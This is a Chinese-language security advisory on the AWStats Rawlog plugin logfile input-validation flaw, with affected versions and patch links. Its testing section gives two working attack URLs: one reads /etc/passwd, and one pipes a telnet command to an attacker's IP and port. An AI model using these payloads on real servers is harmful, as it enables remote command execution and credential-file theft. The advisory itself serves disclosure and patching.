首页 -> 安全研究

安全研究

安全漏洞
AWStats Rawlog插件logfile参数输入验证漏洞

发布日期:2004-08-16
更新日期:2004-08-16

受影响系统:
AWStats AWStats <= 6.3
不受影响系统:
AWStats AWStats 6.5.0 build 1.857
描述:
BUGTRAQ  ID: 10950

AWStats是一款极为流行的基于Web的网站访问统计程序。

AWStats 6.1版本Rawlog插件存在输入验证漏洞,攻击者可利用此漏洞执行远程命令或泄漏Web服务器内容。该漏洞源于没有有效过滤用户传递到awstats.pl的logfile URI数据。

<*来源:K-sPecial.
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/awstats.pl?filterrawlog=&amp;rawlog_maxlines=5000&amp;config=www.example.com&amp;framename=main&amp;pluginmode=rawlog&amp;logfile=/etc/passwd
http://www.example.com/awstats.pl?filterrawlog=&amp;rawlog_maxlines=5000&amp;config=www.example.com&amp;framename=main&amp;pluginmode=rawlog&amp;logfile=&amp;logfile=|telnet &lt;your ip&gt; &lt;port&gt;

Where the &#39;&amp;config&#39; parameter value is the configuration file for www.example.com. It is reported that the configuration filename can be harvested from the HTML source of the awstats page for the target site.

建议:
厂商补丁:

AWStats
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:




AWStats AWStats 5.0
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 5.1
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 5.2
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 5.3
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 5.4
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 5.5
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 5.6
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 5.7
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 5.8
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 5.9
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 6.0
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 6.1
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 6.2
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz


AWStats AWStats 6.3
AWStats awstats-6.4.tgz
http://awstats.sourceforge.net/files/awstats-6.4.tgz

浏览次数:1648
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障